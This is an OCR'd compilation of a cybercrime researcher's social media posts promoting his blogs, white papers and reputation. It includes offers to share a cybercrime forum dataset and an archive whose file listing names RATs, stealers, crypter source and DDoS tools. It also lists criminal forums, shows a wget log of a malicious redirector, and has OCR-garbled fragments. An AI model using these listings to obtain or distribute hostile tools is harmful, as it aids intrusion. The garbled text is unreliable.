https://t.co/JTcqOaYOur https://t.co/MurN|IxYCKu
09:55


https://t.co/JTcqOaYOur https://t.co/70x4xfe3Db
09:55


https://t.co/JTcqOaYOur https://t.co/WaB5dv5GFq

www.cybercamp.es


26 - Friday 


05:09 


Folks. I have a Dark Web Content empire project with multiple blogs on multiple topics coming my way. Do you enjoy my blog? Check out the Dark Web version here - https://t.co/Pr43QvsjCY and stay tuned for the related blog URLs here. Enjoy! https://t.co/K5IrfpoKBj

Dancho Danchev's Dark Web Media Empire - U.S Intelligence Community 2.0 - Email: dancho.danchev@hush.com - Donate BitCoin - belqrs9vq6xns7azpfruhvd6jthkyx2sdfnxunxd6y

Archives

Categories


05:12 


Everything that you donate here will go for research purposes and all the traffic that I can get on the Dark Web will greatly motivate me to launch new blogs part of my content empire network and continue to do my research. https://t.co/Pr43QvsjCY Enjoy! https://t.co/3mY4yvZ3zL

Dancho Danchev's Dark Web Media Empire - U.S Intelligence Community 2.0 - Email: dancho.danchev@hush.com - Donate BitCoin - belqrs9vq6xns7azpfruhvd6jthkyx2sdfnxunxd6y

Archives

Categories


20:55 


https://t.co/HWOd2yR6J8 #security #cybercrime #malware #cybersecuritytips #cyberattacks #threatintelligence #ThreatHunting #threatintel https://t.co/yC4jab2gsV

Dancho Danchev's Dark Web Media Empire - U.S Intelligence Community 2.0 - Email: dancho.danchev@hush.com - Donate BitCoin - belqrs9vq6xns7azpfruhvd6jthkyx2sdfnxunxd6y

Archives

Categories


27 - Saturday 


20:55 


https://t.co/JIcqOaYgET #security #cybercrime #malware #cybersecuritytips 
#cyberattacks #CyberSecurityAwareness #ThreatHunting #Threatintelligence 
#threatintel https://t.co/DBQCN7GArY 


*1
Table 9: Quality of selected intelligence sources (10 out of 45)


% of % of % of 

Blog ; covered ly robust 
iocterms 10Cs 
Dancho Danchev 84% 
Naked Security 45% 
THN 51% 
Webroot 84% 
ThreatPost 29% 
TaoSecurity 68% 
Sucuri §2% 
PaloAlto 87% 
Malwarebytes 72% 
Hexacorn 76% 


20:57 
Stay tuned! https://t.co/JTcqOaYgET https://t.co/kelkOPEAby 


Dancho Danchev Presents 


The International 
OSINT Journal
Compilation on 

Online | 


Hate and ed 
Social M 5 


The Definite OSINT and Actionable Threat Intelligence
Compilation Guide to Assist Law Enforcement and the U.S 
Intelligence Community Internationally 


Dancho Danchev 


https://ddanchev.blogspot.com Email: dancho.danchev@hush.com
29 - Monday


04:09 
My latest white paper for @whoisxmlapi - https://t.co/A9ePkKOUNCf Enjoy! 


05:13 


https://t.co/2U427m48jE #security #cybercrime #malware #CyberAttack 
#cybersecuritytips #cyberattacks #CyberSecurityAwareness #Threatintelligence 
#ThreatHunting #Threatintel 


11:15


Hey @mikko - just came across to this from one of your presentations. Takes you back doesn’t it? - https://t.co/eole2CdhmD Cheers and keep up the good work! Regards. Dancho https://t.co/907TG4mqnNv
11:20
Check this out! In retrospective - money mule recruitment at its best. - 
https://t.co/JIcqOaYgET #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/NrXvvU4Nes
11:20


Check this out! In retrospective - money mule recruitment at its best - Part Two - 
https://t.co/JIcqOaYgET #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/4QHVvtBiExj
11:20


Check this out! In retrospective - money mule recruitment at its best - Part Three- 
https://t.co/JTcqOaYgET #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/HcPrwm1g3K 


Transfer type: Western Union 
First Name: 

Last Name: 

City: 

Country: 

Reference Number (MTCN)*: 908 . 547 .5754 ?) 
Western Union fee (USD)*: 600} 

First Name*: John

Last Name*: Blackmore 
City*: New York 
Country*: United States 
Comments:
Check this out! In retrospective - money mule recruitment at its best - Part Four -
https://t.co/JIcqOaYgET #ThreatHunting #Threatintelligence #Threatintel
https://t.co/8qFFd8fSRB
Check this out! In retrospective - money mule recruitment at its best - Part Five -
https://t.co/JIcqOaYgET #ThreatHunting #Threatintelligence #Threatintel
https://t.co/ADpnBovMzF
11:22


Check this out! In retrospective - money mule recruitment at its best - Part Six - 


11:25 


This is me doing cybercrime fighting collages. Enjoy! - https://t.co/JTcqOaYgET 
#ThreatHunting #Threatintelligence #Threatintel https://t.co/irtjaGmaqlw 


Name


Braankn, dopmel, tabanypt
Application form (ENG)
Application form electron. (ENG)
Application form short (ENG)
Accompanying form for sending MG (ENG) (ONE)
Accompanying form for sending MG (ENG) (SPLIT)
Accompanying form for sending WU (ENG) (ONE)
Accompanying form for sending WU (ENG) (SPLIT)
Espanol
Formulario de Inscripcion (ESP) (.DOC)
Accompanying form for sending WU (ESP) (SPLIT)
Bank details form (ESP) (EEUU)
Form for a sent WU transfer (ESP)
Italian
Application form (ITAL)
Accompanying form for sending WU (ITAL)
Bank details form (ITAL) (EU)
Form for a sent WU transfer (ITAL)
Bank details forms
Bank Details Form /IBAN/ (ENG) 
Bank Details Form /AU/ (ENG) 
Bank Details Form /CA/ (ENG) 
Bank Details Form /UK/ (ENG) 
Bank Details Form /US/ (ENG) 


https://t.co/JTcqOaYgET #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/2vxqOiRd2i
This is me doing cybercrime fighting collages - Part Two - Enjoy! -
https://t.co/JIcqOaYgET #ThreatHunting #Threatintelligence #Threatintel
https://t.co/bYaSCw5ed7
This is the infamous https://t.co/SSokKe9VBHr under my management circa
2003-2006. Here’s a copy of the actual Security Newsletter which I used to produce
there on a monthly basis - https://t.co/PGLUftNfUs [PDF] https://t.co/FlyQeYvPkq 


[Screenshot of the Astalavista.com home page: navigation bar (Home, Top 10 Tools, Security Directory, Security News, Tutorials, Geeky Photos, Links, About Astalavista, Sitemap), site notices, and a list of security news headlines; most of the text is not recoverable]


12:40 
https://t.co/UZ6qVAhNXVE https://t.co/Ywm7 7JrSPh
Webroot Inc.


DANCHO DANCHEV’S 
SECURITY RESEARCH 
FOR WEBROOT INC. 


In-Depth Overview and Analysis 
of Security Blogger Dancho 
Danchev's Security Research for 
Webroot Inc. Circa 2012-2014 


12:41 
https://t.co/UZ6qVANXVE https://t.co/wieh20mQtx
12:43


Dancho 
Danchev's 
Security 
Research 
Compilation 


“Never-published before security research articles 
and OSINT analysis at Dancho Danchev's Medium 
account” 


By Dancho Danchev 


https://t.co/JTcqOaYgET https://t.co/20yGpiGg2!|
white hat info
https://t.co/JIcqOaYgET #ThreatHunting #Threatintel #threatintelligence
https://t.co/R8P2B5bBQA
https://t.co/JTIcqOaYgET #ThreatHunting #Threatintel #threatintelligence
https://t.co/KRBeyVeg69
https://t.co/JTIcqOaYgET #ThreatHunting #Threatintel #threatintelligence
https://t.co/DRrnOX2Wbj
https://t.co/JIcqOaYgET #ThreatHunting #Threatintel #threatintelligence
https://t.co/oDUqPGW6Z9


CREATION DATE ~ 
Feb 20, 2022, 1:3a:18 AM 


Feb 20, 20272, 1:38:16 AM 


MARONG 


23:13 


https://t.co/JIcqOaYgET #ThreatHunting #Threatintel #threatintelligence 
https://t.co/ZB7ONiINSWH
@DaveMarcus Awesome. Thanks for sharing this!


https://t.co/JTcqOaYgET https://t.co/m9MUSY26nT
Feed Stats Dashboard

Wednesday, December 14, 2005 to Saturday, September 14, 2019

2,888 subscribers (on average)
457 reach (on average)

See more about your subscribers » 


Popular Feed Items 


NAME VIEWS CLICKS 

Total 1,557,394 6,377,221 
Historical OSINT - Malicious Malvertising Campaig... 1463 71028 
Historical OSINT - Massive Black Hat SEO Campaign... 1397 70766 
Historical OSINT - Google Docs Hosted Rogue Chrom... 1402 70669 


See more about your feed items » 


23:53 


Me in the news. https://t.co/JIcqOaYgET #ThreatHunting #Threatintel 
#Threatintelligence https://t.co/LClOnvnsg4 


942 


23:53 


Fake CNN Alert Still Spreading Malware

By Gregg Keizer

The massive attack that has infected PCs by tricking users into clicking links in fake messages from CNN.com shows little sign of ending soon, security researchers say.

According to MX Logic Inc., spam posing as CNN.com Top 10 lists peaked at close to 11 million messages per hour early Thursday, but remained at high volumes throughout the day Friday. The Colorado security vendor said it had been tracking an average of 6 million messages per hour since midnight.

MX Logic’s vice president of information security, Sam Masiello, called the trend “a very slow, but steady decline” from the 11 a.m. Mountain Time peak the day before.

Masiello also said that the spam has changed since attacks were first launched on Tuesday. “We've also seen several morphs of this spam over the past couple of days,” he said in an entry posted on the MX Logic blog Friday. Where the messages once trumpeted “CNN.com Daily Top 10” in the subject heading and linked to a single filename on malware-hosting sites, now the spam sports a subject reading “CNN Alerts: My Custom Alert” and uses a variety of filenames in the malicious URL.


Me in the news - Part Two - https://t.co/JIcqOaYgET #ThreatHunting #Threatintel #Threatintelligence https://t.co/4Kz7GO1BEU

Sony PlayStation site victim of SQL-injection attack

Automated attack claims another high-profile target, offering sale of a fake antivirus scanner.

By Robert Vamosi, July 2008

Early Wednesday, antivirus vendor Sophos reported that some visitors to the Sony PlayStation site may have been prompted to download an antivirus scanner.

Pages promoting the PlayStation games SingStar Pop and God of War contained SQL-injected code. Visitors to those specific game pages would see a fake antivirus scan, then a message that the computer was infected with different viruses and Trojan horses. Warned, the user would then be asked to purchase the scanner to remove the bogus malware.

The injected code linking to the scanner has since been removed. Sophos said the attack could have downloaded malicious payloads, but did not

Security researcher Dancho Danchev said in his ZDNet blog that Sony wasn't alone. It was one of 794 domains hit in the latest automated SQL-injection campaign using a multilayer fast flux superstructure built around cokiwoo.com. Over the last 90 days, Google reports that 794 domains have been infected with code pointing to that domain. These are legitimate sites with vulnerabilities that allow criminal hackers to inject code pointing to their servers


23:54 


Me in the news - Part Three - https://t.co/JTcqOaYgET #ThreatHunting #Threatintel 
#Threatintelligence https://t.co/ntMjFWWofE
Me in the news - Part Four - https://t.co/JIcqOaYgET #ThreatHunting #Threatintel
#Threatintelligence https://t.co/3mOSKsBMpr
The Cybercrime Economy


NBC hack infects visitors in ‘drive by' cyberattack


by Julianne Pepitone @juipepitone


February 23, 2013: 9:51 AM ET
Me in the news - Part Five - https://t.co//TcqOaYgET #ThreatHunting #Threatintel
#Threatintelligence https://t.co/5q6MQLhEQD


Web Gang Operating in the Open

By RIVA RICHMOND

Five men believed to be responsible for spreading a notorious computer worm on Facebook and other social networks — and pocketing several million dollars from online schemes — are hiding in plain sight in St. Petersburg, Russia, according to investigators at Facebook and several independent computer security researchers.

The men live comfortable lives in St. Petersburg — and have frolicked on luxury vacations in places like Monte Carlo, Bali and, earlier this month, Turkey, according to photographs posted on social network sites — even though their identities have been known for years to Facebook, computer security investigators and law enforcement officials.

One member of the group, which is popularly known as the Koobface gang, has regularly broadcast the coordinates of its offices by checking in on Foursquare, a location-based social network, and posting the news to Twitter. Photographs on Foursquare also show other suspected members of the group working on Macs in a loftlike room that looks like offices used by tech start-ups in cities around the world.

Beginning in July 2008, the Koobface gang aimed at Web users with invitations to watch a funny or sexy video. Those curious enough to click the link got a message to update their computer's Flash software, which begins the download of the Koobface malware. Victims' computers are drafted into a “botnet,” or network of infected PCs, and are sent official-looking advertisements of fake antivirus software and their Web searches are also hacked and the clicks delivered to unscrupulous marketers. The group made money from people who bought the bogus software and from unsuspecting advertisers.

The security software firm Kaspersky Labs has estimated the network includes 400,000 to 800,000 PCs worldwide at its height in 2010. Victims are often unaware their machines have been compromised.


23:56 
https://t.co/JTcqOaYgET https://t.co/fn9s22egtr

[Image of a Bulgarian-language article; the text is not recoverable. Legible terms include HUMINT, PSYops and ELINT]

Folks. Who wants to do some serious data mining based on my official 36GB Cybercrime Forum Data Set for 2021? Drop me a line at dancho.danchev@hush.com and I would be happy to offer access for research purposes. #Threatintel #Threatintelligence #ThreatHunting https://t.co/jmYAvAaWH7


*1 


949 


<parent> Darkmoney iHonker ShadowMarket 


11Wang DarkWeb LinkFeed SkyFraud 
365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuit.vn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell MaulTalk Szuwi 
Aljyyosh Forum.Zloy.bz Mmpg.ru Tenebris 
Antichat.ru ForumSape Mr11-11mr.7olm.org TheBot
ArmadaBoard ForumSEO Nullnoss.org Toolbabase.se 
BigFozzy Free-hack pay-per-install.org TotalBlackhat 
BlackhatWorld ghostmarket.net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta.pw Vsehobby 
Cardvilla GoFuckBiz ProCrd Webmasters.ru 
Chf gofuckbiz.com ProLogic Whitehat.vn 
CNHonker H4kurd.com Promarket WWH-Club 
CNSec Hack-Port ProxyBase www.opensc.ws 
Crack-Forum Hackersoft scamwarners Xakep.bg 
Cracked.to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOForum Zismo 
Darkmarket.la iFud 


19:46 


Folks. Who wants to do some serious data mining based on my official 36GB 
Cybercrime Forum Data Set for 2021? Drop me a line at dancho.danchev@hush.com 
and I would be happy to offer access for research purposes. #Threatintel
#Threatintelligence #ThreatHunting https://t.co/FDRfptXxtgj 


carders.ws 784,042,156
cccc.ug 204,942,134
erdclub.su 72,086,747
blacknetworld.com 25,444,394
Folks. I also got a second collection which consists of cybercrime-friendly tools
coming straight from the source. Interested in obtaining a copy for research 
purposes? Drop me a line at dancho.danchev@hush.com #Threatintel 
#Threatintelligence #ThreatHunting https://t.co/VYHP8BXDdd 
HacPack_01                              Compressed (zipped) Fol...   730,598 KB
Archive_01                              PowerISO RAR File            655,805 KB
Tools                                   PowerISO RAR File            259,264 KB
HackPack                                PowerISO RAR File            175,814 KB
Malicious_Software_RATs_Cybercri..      PowerISO RAR File            166,073 KB
Tools_01                                PowerISO RAR File            138,313 KB
Sources-delphi_crypters_packers_r...    PowerISO RAR File            135,925 KB
Stealer Pack DarkCoder14                PowerISO RAR File            108,583 KB
Bots-2                                  PowerISO RAR File             83,852 KB
spam_tools                              PowerISO RAR File             69,338 KB
spamming_tools                          PowerISO RAR File             69,338 KB
BotNet.Source.Codes                     PowerISO RAR File             68,373 KB
Malicious_Software_RATs_Keylogge...     PowerISO RAR File             68,199 KB
Ashiyane_Security_Team_Group_H...       PowerISO RAR File             59,751 KB
Malicious_Software_Keyloggers_Cr...     PowerISO RAR File             56,337 KB
TDoS_Attack_Tools_Compilation           PowerISO RAR File             23,822 KB
botnet-ddos                             PowerISO RAR File             12,227 KB
Malware_Crypters_Source_Code            PowerISO RAR File              9,944 KB
Malware_Crypters_Source_Code_01         PowerISO RAR File              6,371 KB
Stealer                                 PowerISO RAR File              4,657 KB
Mujahedeen_Secrets_Encryption_T...      PowerISO RAR File              3,161 KB
RazStealer 2 Cracked                    PowerISO RAR File                 28 KB


31 - Wednesday 


03:28 


My latest white paper for @whoisxmlapi - https://t.co/8e7ZfePXa8 #Threatintel 
#Threatintelligence #ThreatHunting 


09:48 
Cheers! #Threatintelligence https://t.co/yzKZ4rBg Of 


*1 


15:36 


My latest white paper for @whoisxmlapi - https://t.co/o3aOKOOA7F #Threatintel 
#Threatintelligence #threathunting 


September 


1 - Thursday 


07:43 


My latest white paper for @whoisxmlapi - https://t.co/oRO5Z5ajvC #Threatintel 
#ThreatHunting 
22


18:52 


19:27 


3 - Saturday 


09:31 


*1 


https://t.co/JTcqOaYgET #security #cybercrime #malware #Threatintelligence 
#Threatintel #threathunting https://t.co/vwtyjomsHt 


LOVELY HORSE
@iovelyhorse


https://t.co/2U427m48jE #Threatintelligence #Threatintel #threathunting 


Me Inc. https://t.co/glUyYxYIIR 
From an Original Participator in a Top Secret U.S
Government Program to Monitor Hackers Online


A PERSONAL TRIBUTE TO HOW ONE MAN
BASICALLY "PHONED-BACK" AND ACTUALLY GOT
A POSITIVE RESPONSE


"CALLING HOME" - 
OR WHEN THE 
ECHELON STATION 
TALKS BACK 


BY DANCHO DANCHEV 


19:02 


Who wants access to my 36GB Cybercrime Forum Data Set for 2021? Drop me a line 
at dancho.danchev@hush.com in case you’re interested. Regards. Dancho 
https://t.co/grx86i9LWe 
19:02


I also have a second compilation of tools of the trade courtesy of the bad guys
coming straight from the source which I would be willing to share for research
purposes. Drop me a line at dancho.danchev@hush.com in case you're interested.
Regards. Dancho https://t.co/et4p15UZNQ


4 - Sunday 


05:01 


Join us today! Apply for access to @whoisxmlapi Law Enforcement feed and let’s 
catch some bad guys! Enjoy! https://t.co/n6LlhftIm3 https://t.co/DvVOMQCifFw 


Apply for Access to the Law 
Enforcement Nautilus Feed 


The Law Enforcement Nautilus Feed is a private subscription and collaborative service 
that offers in-depth technical analysis and attribution of curated lists of Indicators of 
Compromise (IOCs) and Articles of Interest (AOIs) linked to major malicious
campaigns and APT groups. 


The service is available exclusively to law enforcement, government agencies, 
licensed private investigators, and security organizations. Please start the enrollment 
process by applying for access. 


https://t.co/fnswrm8KWP https://t.co/RgkTknCeBQ 


herdProtect 


13:00 


Who wants to participate in a Q&A with me? Where are the Qs?
https://t.co/JIcqOaYgET 


13:01 
"Sharing is caring". And we’ve been doing it since the early days of humankind. 
13:02 
Who's the first pioneer in the on demand business model? It’s IBM. 


13:04 


Just found out that https://t.co/wHPszdkghv page links to SEC’s Filings page. I’ve
been visiting it for research purposes since my student years. 


13:27 


Check this out - "Covert Blogs and Military Information Strategy" - 
https://t.co/ZB1WFXxEESZ do you think you fit in? 


13:30 


Every OSINT conducted, every information warfare campaign launched, every
disinformation attempt detected is a successful counter-cyber operation.


*1 
13:31 


There’s a saying "An OSINT conducted is a tax payer’s buck saved somewhere". 


*1 
13:33 


Folks. Are you online? Who has questions about my research? Fire them here. 


14:47 

Hey @HBGary - https://t.co/E5JIRzZTddC Awesome! CC: @Greghoglund 
5 - Monday 
00:20 


Thanks for all the RTs. Drop me a line at dancho.danchev@hush.com if you want to 
obtain access to my Cybercrime Forum Data Set for 2021. Happy data mining. CC: 
@DaveMarcus https://t.co/vwxw3WJMoS 
6 - Tuesday


23:27 


Trying to claim my Google Knowledge Panel. https://t.co/ao0mUww0zS 
https://t.co/1tMfGVOebW 
Dancho Danchev


Researcher


Dancho Danchev is an independent security
consultant and cyber threats analyst, with
extensive experience in open source intelligence
gathering, and cybercrime incident response.
https://www.zdnet.com > meet-the-team > ddanchev
Dancho Danchev | Meet the Team - ZDNET


7 - Wednesday 
23:11 

My latest white paper for @whoisxmlapi. Enjoy! https://t.co/ZhZeE127Br 
8 - Thursday 


08:49 


This is me rocking the boat. Keynote here - https://t.co/H7ZRZUN59S always yours 
and forever here - https://t.co/JTcqOaYgET https://t.co/TFad5LiQIlO 


> wget http://artguide.co.il/267/g.php

Resolving artguide.co.il... 62.128.52.211
Connecting to artguide.co.il[62.128.52.211]:80... connected
HTTP request sent, awaiting response... 302 Found
Location: http://ddanchev.blogspot.com/ [following]

Resolving ddanchev.blogspot.com... 74.125.19.191
Connecting to ddanchev.blogspot.com[74.125.19.191]:80... connected
HTTP request sent, awaiting response... 200 OK


08:55 
I’m popular. #threatintel https://t.co/20qbDJy500 


09:00 


From the I’m popular but from the no comment department. https://t.co/JTcqOaYgET 
https://t.co/rjlxixkyQa 


Our team, so often called "Koobface Gang", expresses high gratitude for the help in bug fixing, researches and documentation for our
software to:

- Kaspersky Lab for the name of Koobface and 25 millionth malicious program award;
- Dancho Danchev (http://ddanchev.blogspot.com) who worked hard every day especially on our First Software & Architecture version,
writing lots of e-mails to different hosting companies and structures to take down our Command-and-Control (C&C) servers, and of
course analyzing software under VM Ware;
- Trend Micro (http://trendmicro.com), especially personal thanks Jonell Baltazar, Joey Costoya, and Ryan Flores who had released a
very cool document (with three parts!) describing all our mistakes we've ever made;
- Cisco for their 3rd place to our software in their annual "working groups awards";
- Soren Siebert with his great article;
- Hundreds of users who send us logs, crash reports, and wish-lists.

In fact, it was a really hard year. We've made many efforts to improve our software. Thanks to Facebook's security team - the guys made us
move ahead. And we've moved. And will move. Improving their security system.

By the way, we did not have a cent using Twitter's traffic. But many security issues tell the world we did. They are wrong.

As many people know, "virus" is something awful, which crashes computers, steals credential information as good as all passwords and credit
cards. Our software did not ever steal credit card or online bank information, passwords or any other confidential data. And WILL NOT EVER.
As for the crashes... We are really sorry. We work on it :)

Wish you a good luck in new year and... Merry Christmas to you!

Always yours, "Koobface Gang".


09:03 


Who wants to quote me? This is best of the best in the world of cybercrime. Here’s 
the analysis - https://t.co/bYBreqvUVV #threatintel https://t.co/JKjcqlptdt 


09:06 


Courtesy of @Avast. Attending a journalist meeting for @ZDNET in Prague circa 2010. 
CC: @AvastVlk the pleasure is all mine. https://t.co/oUKWy93Ap} 
09:07


Heading to a conference event circa 2010. https://t.co/1Gkmnq3uSr 
09:09


*1 


At the height of my career. CC: @Webroot https://t.co/f7MXlgvgav 




09:11 


Presenting on Cyber Jihad for @Webroot at RSA Europe 2012. I’m on my own. 
https://t.co/2YTgt7HclA 
09:13


Always yours. https://t.co/JTcqOaYgET https://t.co/JPh4CSF2jM 


09:16 
Rocking the boat at @CybercampEs. Don’t mind the badge. https://t.co/3AlblIEnfpD 
09:27


Awesome. #threatintel https://t.co/evR71pX7YN 


09:28 


Over 3,000 emails taken offline. Talk to me about ransomware gang affiliates. 
https://t.co/ci2QfVZQiJ 
09:30


Dancho Danchev @dancho_... - 11 Nov 20

New Post - "Exposing Protonmail and
Tutanota's Illicit Abuse by Ransomware
Gangs - A Compilation of Currently Active
Ransomware-Themed Email Addresses" -
is.gd/NPLLq5 CC: @ProtonMail
@TutanotaTeam #security #cybercrime
#malware #Threatintelligence


Tutanota
@TutanotaTeam


Replying to @dancho_danchev and @ProtonMail
Thanks for reporting and for sending
the list early on via email. We have
investigated and blocked abusive
accounts already. It's always
best to forward abusive emails
to abuse@tutao.de so we can act
immediately.

19:16 - 11 Nov 20 - Twitter Web App


Awesome. #threatintel https://t.co/ICeNePdtAP 
09:33


You Retweeted

NETRESEC
@netresec
Our #SUNBURST STAGE2 Victim
Table (orgs actively targeted by the
threat actor) has now been updated
to include "paloaltonetworks*".
The internal AD domain for GUID
22334A7227544B1E was discovered
in passive DNS data published by
@dancho_danchev.

[Table columns: Subdomain, Timestamp (UTC), AD Domain]


When I used to be popular. https://t.co/YSOjK640xxX


February 15, 2011


SC Social Media Awards


Best Security Blogger: Graham Cluley, senior
technology consultant at Sophos, for the Naked
Security Blog


Best Corporate Security Blog: Trend Micro's
TrendLabs Malware Blog


Five to Follow on Twitter:


- @cyberwar and @stiennon (Richard Stennon,
chief research analyst of IT-Harvest)

- @George KurtzCTO (George Kurtz, worldwide
CTO of McAfee)

- @danchodanchev (Dancho Danchev,
independent security consultant)

- @jeremiahg (Jeremiah Grossman, founder
and CTO of WhiteHat Security)

- @owasp (the Open Web Application Security
Project)


09:34 
Making the headlines at Wikipedia Hungary. https://t.co/oMknsl61ph 
Astalavista.box.sk


Page type: search engine
Categories: search page
Available language(s): English
Establishment: 1994
Editor-in-Chief: Dancho Danchev
URL: box.sk


The website operated under a Slovak domain name.
The name of the website is based on a movie pun. In
the sci-fi action movie Terminator 2 - The Day of
Judgment, the protagonist's character had a
memorable phrase, "Hasta la vista, baby," a phrase in
Spanish that is a commonly used farewell formula.
The "astalavista" of this sentence is the merging of
the player. It's worth noting that AltaVista, another
well-known search engine of the era that sounded
similar, was only launched in 1995.


In December 2020, cybercrime researcher and
analyst Dancho Danchev, as the operator of the site,
announced the relaunch of the website under the
domain name box.sk. It is designed to support
hackers and cybersecurity experts.


09:45 
My BIO. #threatintel https://t.co/d8vpXoaAgY 
12 - Monday
08:53 


Dancho Danchev is the world's leading expert in the field of
cybercrime fighting and threat intelligence gathering having
actively pioneered his own methodology for processing
threat intelligence leading to a successful set of hundreds
of high-quality analysis and research articles published at
the industry's leading threat intelligence blog - ZDNet's Zero
Day, Dancho Danchev's Mind Streams of Information Security
Knowledge and Webroot's Threat Blog with his research
featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine,
TheRegister, NYTimes, CNET, ComputerWorld, H+Magazine
currently producing threat intelligence at the industry's
leading threat intelligence blog - Dancho Danchev's - Mind
Streams of Information Security Knowledge which has
received over 5.6M page views since December, 2005 and
is currently considered one of the security industry's most
popular security publications.


- Presented at the GCHQ with the Honeynet Project 

- SCMagazine Who to Follow on Twitter for 2011 

- Participated in a Top Secret GCHQ Program called “Lovely 
Horse" 

- Identified a major victim of the SolarWinds Attack - 
PaloAltoNetworks 

- Found malware on the Web Site of Flashpoint 

- Tracked monitored and profiled the Koobface Botnet and 
exposed one botnet operator 

- Made it to Slashdot two times 

- My Personal Blog got 5.6M Page Views Since December, 
2005 

- My old Twitter Account got 11,000 followers 

- I had an average of 7,000 RSS readers on my blog

- I have my own vinyl “Blue Sabbath Black Cheer / Griefer -
We Hate You / Dancho Danchev Suck My Dick” made by a
Canadian artist

- Currently running Astalavista.box.sk

- I gave an interview to DW on the Koobface Botnet

- I gave an interview to NYTimes on the Koobface botnet

- I gave an interview to Russian OSINT

- Listed as a major competitor by Jeffrey Carr's Taia Global 
- Presented at the GCHQ 

- Presented at Interpol 

- Presented at InfoSec 

- Presented at CyberCamp 

- Presented at RSA Europe 


He's currently running a high-profile hacking and s' 
project on the original https://astalavista.box.sk an 


reached at dancho.danchev@hush.com 


My latest white paper for @whoisxmlapi - https://t.co/2 UDbwyWGHX #Threatintel 


08:56 


My latest white paper for @whoisxmlapi - https://t.co/nRSed5Em5f 


08:57 


My latest white paper for @whoisxmlapi - https://t.co/HdOgKjOMGu 


08:58 


My latest white paper for @whoisxmlapi - https://t.co/EKQs7nwSd1 
13 - Tuesday


06:47 
My latest white paper for @whoisxmlapi enjoy! https://t.co/gRLYExuCBq 


10:31 
Anyone hiring? 


10:56 


Amazon Kindle users! Check this out! 13 free volumes - https://t.co/txm7fqDihC of 
my https://t.co/JTcqOaYgET and counting! Happy reading. #security #cybercrime 
#malware #cybersecuritytips #cyberthreats #cyberintelligence #cyberattacks 
#Threatintelligence https://t.co/X9TDm2Yj0Ox 


21 *l1 
RESULTS
Dancho Danchev’s Personal Security Hacking and Cybercrime Research Memoir Volume 02: An In-Depth
Picture Inside Security Researcher's Dancho Danchev Understanding of Security Hacking and Cybercrime
Kindle Edition
Available instantly

Dancho Danchev’s Personal Security Hacking and Cybercrime Research Memoir Volume 01: An In-Depth
Picture Inside Security Researcher's Dancho Danchev Understanding of Security Hacking and Cybercrime
Kindle Edition
Available instantly

Dancho Danchev’s Personal Security Hacking and Cybercrime Research Memoir Volume 07: An In-Depth
Picture Inside Security Researcher's Dancho Danchev Understanding of Security Hacking and Cybercrime
Kindle Edition
Available instantly


My latest white paper for @whoisxmlapi. Enjoy! https://t.co/6abLUIrT8i 


14 - Wednesday 


00:37 


My "Cyber Threat Actors OSINT Analysis for 2021". - https://t.co/gTZ1bJEDvm always 
yours at https://t.co/JTcqOaYgET enjoy and feel free to share! 
00:42


My "Conti Ransomware Group OSINT Analysis for 2022" - https://t.co/otelaow7dp 
always yours at https://t.co/JTcqOaYgET enjoy and feel free to share! 


17 - Saturday 


19:51 


Folks. This is Dancho (https://t.co/JTcqOaYgET). I’m proud to introduce the Web’s first 
and the security industry and #OSINT community’s first crypto currency enabled 
marketplace for buyers and sellers of OSINT. Drop me a line at 
dancho.danchev@hush.com https://t.co/wKWjoTDUOs 




OSINT MARKETPLACE 


18 - Sunday 
00:03 


"Sharing is caring". Drop me a line today at dancho.danchev@hush.com and request 
your invitation to buy and sell your OSINT research on the Web’s primary destination 
spot for #OSINT researchers and buyers of OSINT research on cyber threat actors. 
https://t.co/4Ekz9VqDFC 


OSINT MARKETPLACE 


05:33 
https://t.co/JTcqOaYgET https://t.co/m2TCaxXp3sZ 




19 - Monday 


04:25 
My latest white paper for @whoisxmlapi - https://t.co/100jzZDTvq Enjoy! 


*1 
05:53 


My latest white paper for @whoisxmlapi - https://t.co/AgPUHBWU1h Enjoy! 
20 - Tuesday


03:02 
My latest white paper for @whoisxmlapi - https://t.co/COSmdVxzKY 


03:22 


https://t.co/GOvJRHpUfx #security #cybercrime #malware #ThreatHunting 
#Threatintelligence 


10:42 
My latest white paper for @whoisxmlapi - https://t.co/g84nMXIf98 Enjoy! 


22 - Thursday 


21:23 


Folks. I’m just about to launch my newly branded and about to dazzle you with 
content "Dancho Danchev’s Dark Web Content Media Empire" - 
https://t.co/Pr43QvrLNq Here’s a preview. Guess what? There’s more to come. Visit 
us today and stay tuned! RT pls. https://t.co/QQS3C0eZex 


*1 


24 - Saturday 


04:10 


Free copy of the memoir - https://t.co/kjEQQO0VQGc [PDF] free audio
book - https://t.co/P9FAOWVQgX [MP3] the original in English here -
https://t.co/qLxz4GuRip [PDF] The pleasure is all mine! Regards. Dancho.
https://t.co/IODRypLeMC

https://ddanchev.blogspot.com Email: dancho.danchev@hush.com


16:16 


https://t.co/JTIcqOaYgET #security #cybercrime #malware #cybersecuritytips 
#cyberwar #ThreatHunting #threatintelligence #threatintel https://t.co/jxETrNvFE4 
Aggregate Item Use

Wednesday, December 14, 2005 — Saturday, September 14, 2019
2,572,020 views of 1038 items
6,497,440 clicks back to the site on 1217 items


25 - Sunday 


11:24 


https://t.co/JTcqOaYgET | https://t.co/n6Lihftim3 | https://t.co/OmUajr8DT8 #security 
#cybercrime #malware #cybersecuritytips #CyberSec #ThreatHunting 
https://t.co/2kspRXpfHh 
Welcome to the community-driven and commercial WhoisXML API
OpenCTI instance where we aim to offer a novel and unique peek
inside the modern threat landscape on a daily basis through the
machine-readable communication of novel attack techniques
including TTPs (Tactics Techniques and Procedures) including all
the relevant and real-time processed IoCs (Indicators of
Compromise) for current and ongoing cyber attack campaigns and
currently circulating malicious software spam and phishing
campaigns spreading rogue and fraudulent online campaigns.
Inquire about your API key here -
https://threat-intelligence.whoisxmlapi.com/nautilus-feed or send a message to
research@whoisxmlapi.com


26 - Monday 


04:21 


Got some cybercriminals coming your way? Send all the spam phishing and 
malicious software my way. I promise that I'll take a moment of my time and process
this. Thanks mother for the shot. Don’t mock me about where all that beer is going. 

